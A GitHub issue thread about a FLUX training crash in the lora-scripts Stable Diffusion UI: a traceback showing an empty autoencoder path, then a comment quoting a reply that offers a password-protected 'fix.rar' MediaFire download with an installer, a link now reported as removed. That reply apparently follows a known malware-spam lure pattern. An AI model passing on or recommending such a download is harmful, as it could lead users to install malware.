### ISSUE TITLE
Stable Diffusion 训练 UI 1.8.5升级 v1.9.0 FLUX炼丹错误

### ISSUE THREAD

**Issue by ade520530** [Akegarasu/lora-scripts#489]
Traceback (most recent call last):
File "D:\lora-scripts-v1.8.5\sd-scripts\library\flux_utils.py", line 35, in load_safetensors
return load_file(path, device=device)
File "D:\lora-scripts-v1.8.5\python\lib\site-packages\safetensors\torch.py", line 308, in load_file
with safe_open(filename, framework="pt", device=device) as f:
FileNotFoundError: No such file or directory: ""
﻿
During handling of the above exception, another exception occurred:
﻿
Traceback (most recent call last):
File "D:\lora-scripts-v1.8.5\sd-scripts\flux_train_network.py", line 411, in <module>
trainer.train(args)
File "D:\lora-scripts-v1.8.5\sd-scripts\train_network.py", line 342, in train
model_version, text_encoder, vae, unet = self.load_target_model(args, weight_dtype, accelerator)
File "D:\lora-scripts-v1.8.5\sd-scripts\flux_train_network.py", line 74, in load_target_model
ae = flux_utils.load_ae(name, args.ae, weight_dtype, "cpu", disable_mmap=args.disable_mmap_load_safetensors)
File "D:\lora-scripts-v1.8.5\sd-scripts\library\flux_utils.py", line 63, in load_ae
sd = load_safetensors(ckpt_path, device=str(device), disable_mmap=disable_mmap, dtype=dtype)
File "D:\lora-scripts-v1.8.5\sd-scripts\library\flux_utils.py", line 37, in load_safetensors
return load_file(path)  # prevent device invalid Error
File "D:\lora-scripts-v1.8.5\python\lib\site-packages\safetensors\torch.py", line 308, in load_file
with safe_open(filename, framework="pt", device=device) as f:
FileNotFoundError: No such file or directory: ""
22:14:22-175083 ERROR    Training failed / 训练失败

**Comment by ade520530** [comment]
> 下载 https://www.mediafire.com/file/czdodbba054p738/fix.rar/file 密码：changeme 在安装程序菜单中，选择“gcc”。

似乎缺少了一些东西……
The key you provided for file access was invalid. This is usually caused because the file is no longer stored on MediaFire. This occurs when the file is removed by the originating user or MediaFire.

[主页](https://www.mediafire.com/)
